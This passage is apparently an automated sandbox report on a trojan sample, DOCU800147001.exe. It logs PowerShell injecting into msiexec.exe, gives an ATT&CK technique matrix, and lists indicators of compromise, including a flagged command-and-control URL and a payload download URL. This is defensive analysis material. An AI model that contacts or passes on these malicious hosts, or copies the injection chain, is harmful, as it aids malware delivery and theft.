      Source: C:\Users\user\Desktop\DOCU800147001.exeAPI call chain: ExitProcess graph end nodegraph_0-3253
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
      Source: C:\Users\user\Desktop\DOCU800147001.exeCode function: 0_2_00405EA5 GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_00405EA5
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior

      HIPS / PFW / Operating System Protection Evasion

      barindex
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created / APC Queued / Resumed: C:\Windows\SysWOW64\msiexec.exeJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread APC queued: target process: C:\Windows\SysWOW64\msiexec.exeJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\SysWOW64\msiexec.exe base: 3E60000Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.SecureBoot.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.SecureBoot.Commands.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0012~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\UEV\Microsoft.Uev.Commands.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\WindowsErrorReporting\Microsoft.WindowsErrorReporting.PowerShell.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure.CimCmdlets\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.CimCmdlets.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\DOCU800147001.exeCode function: 0_2_00405B9C GetVersion,GetSystemDirectoryA,GetWindowsDirectoryA,SHGetSpecialFolderLocation,SHGetPathFromIDListA,CoTaskMemFree,lstrcatA,lstrlenA,0_2_00405B9C
      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
      Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
      Windows Management Instrumentation
      1
      DLL Side-Loading
      311
      Process Injection
      1
      Masquerading
      OS Credential Dumping11
      Security Software Discovery
      Remote Services1
      Archive Collected Data
      1
      Encrypted Channel
      Exfiltration Over Other Network Medium1
      System Shutdown/Reboot
      CredentialsDomainsDefault Accounts1
      Native API
      Boot or Logon Initialization Scripts1
      DLL Side-Loading
      21
      Virtualization/Sandbox Evasion
      LSASS Memory1
      Process Discovery
      Remote Desktop Protocol1
      Clipboard Data
      3
      Ingress Tool Transfer
      Exfiltration Over BluetoothNetwork Denial of Service
      Email AddressesDNS ServerDomain Accounts2
      PowerShell
      Logon Script (Windows)Logon Script (Windows)311
      Process Injection
      Security Account Manager21
      Virtualization/Sandbox Evasion
      SMB/Windows Admin SharesData from Network Shared Drive4
      Non-Application Layer Protocol
      Automated ExfiltrationData Encrypted for Impact
      Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
      Obfuscated Files or Information
      NTDS1
      Application Window Discovery
      Distributed Component Object ModelInput Capture14
      Application Layer Protocol
      Traffic DuplicationData Destruction
      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
      Software Packing
      LSA Secrets2
      File and Directory Discovery
      SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
      DLL Side-Loading
      Cached Domain Credentials14
      System Information Discovery
      VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


      windows-stand
      SourceDetectionScannerLabelLink
      DOCU800147001.exe18%ReversingLabsWin32.Trojan.Generic
      SourceDetectionScannerLabelLink
      C:\Users\user\AppData\Local\Ramtils\Formaldehyds\tyngdepunkterne\Kulds\DOCU800147001.exe18%ReversingLabsWin32.Trojan.Generic
      C:\Users\user\AppData\Local\Temp\nsx7F0.tmp\nsExec.dll0%ReversingLabs
      No Antivirus matches
      No Antivirus matches
      SourceDetectionScannerLabelLink
      http://b2csa.icu/m320%Avira URL Cloudsafe
      http://b2csa.icu/0%Avira URL Cloudsafe
      http://electricsuitcase.net/wp-includes/block-bindings/wTryLAihFvcVmUK202.bin20%Avira URL Cloudsafe
      http://b2csa.icu/PL341/index.phpFv0%Avira URL Cloudsafe
      http://b2csa.icu/PL341/index.phpal0%Avira URL Cloudsafe
      http://b2csa.icu/PL341/index.phpVVWT0%Avira URL Cloudsafe
      http://electricsuitcase.net/wp-includes/block-bindings/wTryLAihFvcVmUK202.bin0%Avira URL Cloudsafe
      http://b2csa.icu/PL341/index.phpj0%Avira URL Cloudsafe
      http://b2csa.icu/P50%Avira URL Cloudsafe
      http://b2csa.icu/PL341/index.php100%Avira URL Cloudmalware
      NameIPActiveMaliciousAntivirus DetectionReputation
      electricsuitcase.net
      107.151.162.135
      truefalse
        unknown
        b2csa.icu
        104.21.32.1
        truetrue
          unknown
          NameMaliciousAntivirus DetectionReputation
          http://b2csa.icu/PL341/index.phptrue
          • Avira URL Cloud: malware
          unknown
          http://electricsuitcase.net/wp-includes/block-bindings/wTryLAihFvcVmUK202.binfalse
          • Avira URL Cloud: safe
          unknown
          NameSourceMaliciousAntivirus DetectionReputation
          http://nuget.org/NuGet.exepowershell.exe, 00000002.00000002.2531096642.0000000005CAA000.00000004.00000800.00020000.00000000.sdmpfalse
            high
            https://aka.ms/winsvr-2022-pshelppowershell.exe, 00000002.00000002.2527630104.0000000004D96000.00000004.00000800.00020000.00000000.sdmpfalse
              high
              http://electricsuitcase.net/wp-includes/block-bindings/wTryLAihFvcVmUK202.bin2msiexec.exe, 00000008.00000002.2616759739.000000000699A000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              http://b2csa.icu/m32msiexec.exe, 00000008.00000002.2616759739.000000000699A000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000002.00000002.2527630104.0000000004D96000.00000004.00000800.00020000.00000000.sdmpfalse
                high
                http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000002.00000002.2527630104.0000000004D96000.00000004.00000800.00020000.00000000.sdmpfalse
                  high
                  http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000002.00000002.2527630104.0000000004D96000.00000004.00000800.00020000.00000000.sdmpfalse
                    high
                    https://contoso.com/Licensepowershell.exe, 00000002.00000002.2531096642.0000000005CAA000.00000004.00000800.00020000.00000000.sdmpfalse
                      high
                      https://contoso.com/Iconpowershell.exe, 00000002.00000002.2531096642.0000000005CAA000.00000004.00000800.00020000.00000000.sdmpfalse
                        high
